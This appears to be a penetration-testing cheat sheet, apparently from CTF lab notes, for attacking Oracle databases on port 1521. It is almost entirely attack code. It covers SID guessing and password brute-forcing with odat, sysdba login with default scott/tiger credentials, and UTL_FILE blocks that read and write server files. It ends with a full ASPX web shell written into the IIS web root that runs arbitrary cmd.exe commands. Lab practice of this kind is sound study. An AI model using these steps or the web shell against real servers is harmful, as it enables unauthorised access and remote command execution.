TryhackmeHackthebox

Oracle SQL | 1521

  • Scan SIDs

odat sidguesser -s 10.10.10.82

  • Brute force Passwords

odat passwordguesser -s 10.10.10.82 -d XE --accounts-file /usr/share/odat/accounts/accounts.txt

  • Login to SQPLUS Database

## ------------------| Setup
sudo apt-get install oracle-instantclient-sqlplus
which sqlplus
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH

## ------------------| Login as user
sqlplus <USERNAME>/'<PASSWORD>'@<IP>:1521/XE

## ------------------| Login as superuser
sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba

  • SQLPLUSS Quarries

select * from session_privs;
select * from user_role_privs;

  • Read File

set serveroutput ON

declare
   f utl_file.file_type;
   s varchar(5000);
begin
   f := utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
   utl_file.get_line(f,s);
   utl_file.fclose(f);
   dbms_output.put_line(s);
end;

# Hit enter then type '/' and  hit enter

  • Write File

declare
   f utl_file.file_type;
   s varchar(5000) := 'h4rithd was there';
begin
   f := utl_file.fopen('/inetpub/wwwroot','h4rith.txt','W');
   utl_file.put_line(f,s);
   utl_file.fclose(f);
end;

# Hit enter then type '/' and  hit enter

  • Write bind shell. (aspx)

declare
   f utl_file.file_type;
   s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
   f := utl_file.fopen('/inetpub/wwwroot','h4rithd.aspx','W');
   utl_file.put_line(f,s);
   utl_file.fclose(f);
end;

# Hit enter then type '/' and  hit enter
PreviousDatabaseNextMSSQL / MYSQL / PSQL

Last updated